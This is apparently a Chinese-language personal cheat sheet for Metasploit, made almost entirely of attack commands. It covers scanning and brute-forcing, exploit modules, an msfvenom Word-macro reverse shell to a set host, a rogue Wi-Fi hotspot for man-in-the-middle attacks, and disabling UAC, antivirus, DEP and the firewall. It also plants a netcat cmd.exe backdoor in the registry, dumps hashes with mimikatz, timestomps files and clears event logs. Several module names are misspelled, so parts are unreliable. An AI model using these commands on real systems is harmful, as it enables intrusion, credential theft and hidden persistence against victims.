Metasploit Framework笔记

  9 mins to read  

List [CTL]

    简介

    Metasploit Framework是一个使用Ruby写成的集成渗透测试框架,涵盖了信息搜集,漏洞利用,提权,后渗透阶段的大多数功能,一个框架的意义便在于此。

    MSF后台有Postgresql数据库,收集了近十几年的将近1800个Exp,以及200多个针对各个平台的Payload(应该是这个数字,记不太清而且好久没更新了)。MSF的数据库开在主机的5432端口,首先

    service postgresql start

    netstat -ano | grep 5432查看是否启动

    信息收集

    MSF可以调用Nessus,Openvas或Nmap等进行漏洞扫描,扫描后可以通过

    creds账号密码

    vulns漏洞

    loot哈希

    除此之外,MSF还有不少漏洞扫描模块,都在auxiliary/scanner

    SNMP扫描

    vim /etc/default/snmpd修改为0.0.0.0

    use auxiliary/scanner/snmp/snmp_login

    use auxiliary/scanner/snmp/snmp_enum

    use auxiliary/scanner/snmp/snmp_enumusers

    use auxiliary/scanner/snmp/snmp_enumshares

    SMB扫描

    use auxiliary/scanner/smb/smb_version

    use auxiliary/scanner/smb/smb_enumshares共享枚举

    use auxiliary/scanner/smb/smb_enumusers用户枚举

    use auxiliary/scanner/smb/smb_lookupsidsid枚举(系统用户sid)

    SSH扫描

    (SSH1 SSH1.9存在安全隐患)

    use auxiliary/scanner/ssh/ssh_login爆破

    use auxiliary/scanner/ssh/ssh_login_pubkey公钥登录

    MSSQL扫描

    (TCP 1433/UDP 1434)

    use auxiliary/scanner/mssql/mssql_ping

    use auxiliary/scanner/mssql/mssql_login

    use auxiliary/scanner/mssql/mssql_exec

    FTP扫描

    use auxiliary/scanner/ftp/ftp_version

    use auxiliary/scanner/ftp/anonymous

    弱点扫描

    VNC扫描(5900 Port)use auxiliary/scanner/vnc/

    RDP远程桌面use auxiliary/scanner/rdp/ms12_020_check

    设备后门扫描use auxiliary/scanner/ssh/juniper_backdoor

    use auxiliary/scanner/ssh/fortinet_backdoor

    HTTP弱点扫描

    use auxiliary/scanner/http/dir_listing(file_dir)   目录及文件
use auxiliary/scanner/http/tomcat_mgr_login   admin后台
use auxiliary/scanner/http/verb_auth_bypass   http身份验证绕过
use auxiliary/scanner/http/wordpress_login_enum   wp暴力破解

    SIP端点扫描

    auxiliary/scanner/sip/options
auxiliary/scanner/sip/enumerator        //VOIP服务,IP电话

auxiliary/voip/sip_invite_spoof         //伪造通话
exploit/windows/sip/sipxphone_cseq      //渗透

    SCADA系统

    exploit/windows/scada/realwin_scpc_initialize

    利用Shodan扫描

    auxiliary/gather/shodan_search

    漏洞利用

    选定Payload后generate生成载荷代码

    generate::

    args 
    -b除去坏字符如’\x00’
    -e选择encoder
    -i编码次数
    -t输出格式如raw,exe
    -x绑定程序
    -f输出文件名
    -p系统架构如android
    -sNOP sled字节长度,利于EIP精确定位

    其中有一种基于内存的非常强大的Payload,名叫Meterpreter

    command 
    run/bgrun运行子模块
    clearev删除日志
    download下载文件到lpwd目录
    execute -f/H/i执行程序 指定/隐藏/交互
    load priv/getsystem提权
    migrate [PID]迁移进程
    idletime查看待机时间
    getuid查看当前权限

    Acrobat Reader漏洞

    exploit/windows/filefoemat/adobe_utilprintf   Adobe Reader v 8.1.2 win xp
exploit/windows/filefoemat/adobe_pdf_embedded_exe   Adobe Reader v 8.x, v 9.x win xp/vis/7
exploit/windows/browser/adobe_utilprintf   构建网页

    Flash漏洞

    exploit/multi/browser/adobe_flash_hacking_team_uaf
exploit/multi/browser/adobe_flash_opaque_background_uaf

    IE漏洞

    exploit/windows/browser/ms_14_064_ole_code_execution

    Word漏洞

    exploit/windows/filefoemat/ms10_087_rtf_pfragments_bof

    JRE漏洞

    exploit/multi/browser/java_jre17_driver_manager
exploit/multi/browser/java_jre17 _jmxbean
exploit/multi/browser/java_jre17_reflection_types

    Word宏Payload

    msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -f vba-exe
//part 1 为宏代码
//part 2 为word正文

    exploit/windows/fileformat/ms10_087_rtf_pfragments_bof

    浏览器Autopwn

    auxiliary/server/browser_autopwn

    两种利用方法:

    • xss手段注入代码,<iframe src = "" width=0 height=0 style="hidden" frameboarder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
    • DNS劫持

    伪造热点中间人攻击

    airmon-ng start wlan0
airbase-ng -P -C 30 -e "FREE-CMCC" -v wlan0mon
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0      //激活at0
touch /var/lib/dhcp/dhcpd.leases        //建立Dhcp租约
dhcpd -cf /etc/dhcp/dhcpd.conf at0      //启动Dhcp服务器
msfconsole  -q -r karma.rc_.txt

//使客户端联网,开启ip转发
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

    后渗透阶段

    绕过UAC

    exploit/windows/local/ask
set filename => winupdate.exe

exploit/windows/local/bypassuac
exploit/windows/local/bupassuac_injection

//通过注册表项
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

    基于已有Session提权

    exploit/windows/local/ms13_053_schlamperei      //win7
exploit/windows/local/ms13_081_track_popup_menu
exploit/windows/local/ms13_097_ie_registry_symlik
exploit/windows/local/ppr_flatten_rec

    Graphical Payload

    payload/windows/vncinject/reverse_tcp

    Hash Dump

    meterpreter>> load priv
meterpreter>> hash dump

    哈希密文登录

    exploit/windows/smb/psexec
set smbpass => [hash]
//需关闭UAC

    关闭firewall

    //需admin/system权限
netsh advfirewall set allprofiles state on/off
net stop windefend

    磁盘加密Bitloker

    manage-bde -off c:
manage-bge -status c:

    关闭DEP

    bcdedit.exe /set {current} nx AlwaysOff

    Kill 杀毒软件

    run killav
post/windows/manage/killav

    开启远程桌面

    post/windows/maange/enable_rdp
run multi_console_command -rc [file]        //生成资源文件可用来关闭复原

run getgui -e
run getgui -u admin -p 123      //添加3389用户组

    获取系统Tokens

    load incognito
lisk_tokens -u
impersonate_token lab \\admin
execute -f cmd.exe -i -t(使用当前Token)

exploit/windows/local/ms10_015_kitrapod

    注册表添加后门

    upload /usr/share/windows_binaries/nc.exe c:\\windows\\system32
reg enumkey HKLM\\software\\microsoft\\windows\\currentversion\\run     //枚举
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'        //设定值
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc       //查询生效

    打开防火墙端口

    execute -f cmd -i -H
netsh firewall show opmode
netsh firewall add portopening TCP 444 "test" ENABLE ALL
shutdown -r -t 0

    抓包

    抓包缓存于硬盘,全程SSL加密

    load sniffer
sniffer_interfaces
sniffer_start [id]
sniffer_dump [id] *.cap

    解包

    use auxiliary/sniffer/psnuffle
set PCAPFILE => *.cap

    John The Ripper破解弱口令

    post/windows/gather/hashdump
auxiliaty/analyze/jtr_crack_fast

    修改文件系统MAC时间

    M: Modified

    A: Accessed

    C: Changed

    Linux下touch指令修改

    Timestomp -v 1.txt
          -f c:\\2.txt 1.txt      //获取模版时间
          -z        //全改

    路由转发

    获取shell后»扫描内网

    run autoroute -s 1.1.1.0/24
              -p    //查看已添加路由

    扫描内网

    auxiliary/scanner/portscan/tcp

    端口转发

    获取shell后

    >> portfwd -add -L [local ip] -l [local port] -r [remote ip] -p [remote port]
>> portfwd list/delete/flush

    POST模块

    post/windows/gather/arp_scanner

post/windows/gather/checkvm         //测试虚拟机

post/windows/gather/credentials/credential_collector        //查主机账号和hash

post/windows/gather/enum_applications       //应用扫描

post/windows/gather/enum_logged_on_users        //当前登录账号

post/multi/recon/local_exploit_suggester        //本地提权漏洞

post/windows/manage/delete_user     //删用户

post/multi/gather/env       //搜集环境信息

post/multi/gather/firefox_creds     //火狐保存账号密码

post/multi/gather/ssh_creds         //ssh

post/multi/gather/chesk_malware     //恶意软件检测

    持久化后门

    run metsvc -A
use exploit/multi/handler
set payload windows/metsvc_bind_tcp

run persistence -h
                -X 自启动
                -r [ip]
                -i 延迟启动

    mimikatz密码

    getsystem
load mimikatz
kerberos/wdigest/msv/ssp
mimikatz_command -f a::         //查看模块
                    samdump::
                    handle::

    清除痕迹

    run event_manager -i 显示
                  -c 清除
      
                  
clearv

    基于Session钓鱼

    post/windows/manage/inject_host     //host文件注入
post/windows/gather/phish_login_pass        //钓鱼